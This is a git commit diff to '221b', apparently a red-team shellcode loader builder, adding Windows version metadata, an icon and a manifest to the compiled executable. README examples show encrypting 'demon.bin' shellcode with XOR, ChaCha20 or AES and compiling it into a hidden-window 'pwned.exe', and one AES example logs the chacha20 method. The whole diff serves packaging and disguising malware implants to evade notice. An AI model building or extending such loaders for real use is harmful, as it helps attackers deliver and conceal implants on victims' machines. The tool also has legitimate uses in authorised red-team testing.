[Feat] - Add goversioninfo (#12)

* working for xor

* update keys

* update readme

* fix typo

* fix

---------

Co-authored-by: sanctuary <[email protected]>

Author: jenaye

README.md

@@ -40,10 +40,59 @@ Global Flags:
 
 ```
 
-## Example
+## Binary properties
+
+It is possible to add a certain number of metadata as well as a logo via the folder named `misc`. 
+
+also remember to modify the `versioninfo.json` file at the root of the project 
+
+
+here's a preview of the final rendering, so don't ignore this part when planning a red team operation. 
+
+![](/img/preview.png)
+
+
+## Possible execution methods
+
+### XOR : 
 
 ```shell
-221b bake -k shflfhje -s test.sh
+221b bake -k "@ShLkHms221b" -s /PathToShellcode/demon.bin -o pwned.exe
+[+] use xor encryption method
+[+] encrypting demon.bin
+[+] loading encrypted shell into payload
+[+] compiling binary
+go: added golang.org/x/crypto v0.11.0
 go: added golang.org/x/sys v0.10.0
-[+] file compiled to ./test.exe
-```
+[+] file compiled to pwned.exe
+```
+
+### Chacha20
+
+```shell
+221b bake -m chacha20 -k "0123456789ABCDEF1123345611111111" -s /PathToShellcode/demon.bin -o pwned.exe
+[+] use chacha20 encryption method
+[+] encrypting demon.bin
+[+] loading encrypted shell into payload
+[+] compiling binary
+go: added golang.org/x/crypto v0.11.0
+go: added golang.org/x/sys v0.10.0
+[+] file compiled to pwned.exe
+```
+
+
+### AES
+
+```shell
+221b bake -m aes -k "0123456789ABCDEF1123345611111111" -s /PathToShellcode/demon.bin -o pwned.exe
+[+] use chacha20 encryption method
+[+] encrypting demon.bin
+[+] loading encrypted shell into payload
+[+] compiling binary
+go: added golang.org/x/crypto v0.11.0
+go: added golang.org/x/sys v0.10.0
+[+] file compiled to pwned.exe
+```
+
+
+

img/preview.png

@@ -20,6 +20,9 @@ func (a Aes) Load(content, key []byte) ([]byte, error) {
 		"key": func() string {
 			return string(key)
 		},
+		"basepath": func() string {
+			return basepath
+		},
 		"shellcode": func() string {
 			result := []string{}
 

loader/aes.go

@@ -20,6 +20,9 @@ func (a ChaCha20) Load(content, key []byte) ([]byte, error) {
 		"key": func() string {
 			return string(key)
 		},
+		"basepath": func() string {
+			return basepath
+		},
 		"shellcode": func() string {
 			result := []string{}
 

loader/chacha20.go

@@ -2,6 +2,7 @@ package loader
 
 import (
 	"fmt"
+	"io/ioutil"
 	"os"
 	"os/exec"
 	"path/filepath"
@@ -31,6 +32,10 @@ const (
 	tmpDir  = "/tmp/221b-compile"
 )
 
+var (
+	basepath, _ = os.Getwd()
+)
+
 func (b baseLoader) Compile(outputPath string, content []byte) error {
 	if err := b.setupTmpDir(content); err != nil {
 		return err
@@ -54,14 +59,18 @@ func (b baseLoader) Compile(outputPath string, content []byte) error {
 		return err
 	}
 
+	_ = b.execCmd(
+		"go",
+		"generate",
+	)
+
 	err = b.execCmd(
 		"go",
 		"build",
 		"-ldflags",
 		"-s -w -H=windowsgui",
 		"-o",
 		relOutputPath,
-		filepath.Join(tmpDir, tmpFile),
 	)
 	if err != nil {
 		logger.Error(fmt.Errorf("failed to compile"))
@@ -92,6 +101,12 @@ func (b baseLoader) setupTmpDir(goFile []byte) error {
 		return err
 	}
 
+	data, err := ioutil.ReadFile(filepath.Join(basepath, "versioninfo.json"))
+	if err != nil {
+		panic(err)
+	}
+	_ = ioutil.WriteFile(filepath.Join(tmpDir, "versioninfo.json"), data, 0666)
+
 	if err := os.WriteFile(filepath.Join(tmpDir, tmpFile), goFile, 0666); err != nil {
 		logger.Error(fmt.Errorf("could not write tmp file"))
 		return err

loader/loader.go

@@ -20,6 +20,9 @@ func (x Xor) Load(content, key []byte) ([]byte, error) {
 		"key": func() string {
 			return string(key)
 		},
+		"basepath": func() string {
+			return basepath
+		},
 		"shellcode": func() string {
 			result := []string{}
 

loader/xor.go

@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+  <assemblyIdentity
+    type="win32"
+    name="Github.com.JosephSpurrier.GoVersionInfo"
+    version="1.0.0.0"
+    processorArchitecture="*"/>
+ <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
+   <security>
+     <requestedPrivileges>
+       <requestedExecutionLevel
+         level="asInvoker"
+         uiAccess="false"/>
+       </requestedPrivileges>
+   </security>
+ </trustInfo>
+</assembly>

misc/goversioninfo.exe.manifest

@@ -1,6 +1,7 @@
 package templates
 
 var AesTmpl = `
+//go:generate goversioninfo -icon={{ basepath }}/misc/pwned.ico -manifest={{ basepath }}/misc/goversioninfo.exe.manifest
 package main
 
 import (

misc/pwned.ico

@@ -1,6 +1,7 @@
 package templates
 
 var ChaCha20Tmpl = `
+//go:generate goversioninfo -icon={{ basepath }}/misc/pwned.ico -manifest={{ basepath }}/misc/goversioninfo.exe.manifest
 package main
 
 import (

templates/aes.go

@@ -1,6 +1,7 @@
 package templates
 
 var XorTmpl = `
+//go:generate goversioninfo -icon={{ basepath }}/misc/pwned.ico -manifest={{ basepath }}/misc/goversioninfo.exe.manifest
 package main
 
 import (

templates/chacha20.go

@@ -0,0 +1,43 @@
+{
+    "FixedFileInfo": {
+        "FileVersion": {
+            "Major": 1,
+            "Minor": 0,
+            "Patch": 0,
+            "Build": 0
+        },
+        "ProductVersion": {
+            "Major": 1,
+            "Minor": 0,
+            "Patch": 0,
+            "Build": 0
+        },
+        "FileFlagsMask": "3f",
+        "FileFlags ": "00",
+        "FileOS": "040004",
+        "FileType": "01",
+        "FileSubType": "00"
+    },
+    "StringFileInfo": {
+        "Comments": "Edit me, im malicious binary",
+        "CompanyName": "221b",
+        "FileDescription": "edit me, im a malware",
+        "FileVersion": "4.0",
+        "InternalName": "TheMalware",
+        "LegalCopyright": "@TomChv / @Jenaye_fr",
+        "LegalTrademarks": "",
+        "OriginalFilename": "malicious.exe",
+        "PrivateBuild": "",
+        "ProductName": "Support",
+        "ProductVersion": "v1.0.0.0",
+        "SpecialBuild": ""
+    },
+    "VarFileInfo": {
+        "Translation": {
+            "LangID": "0409",
+            "CharsetID": "04B0"
+        }
+    },
+    "IconPath": "",
+    "ManifestPath": ""
+}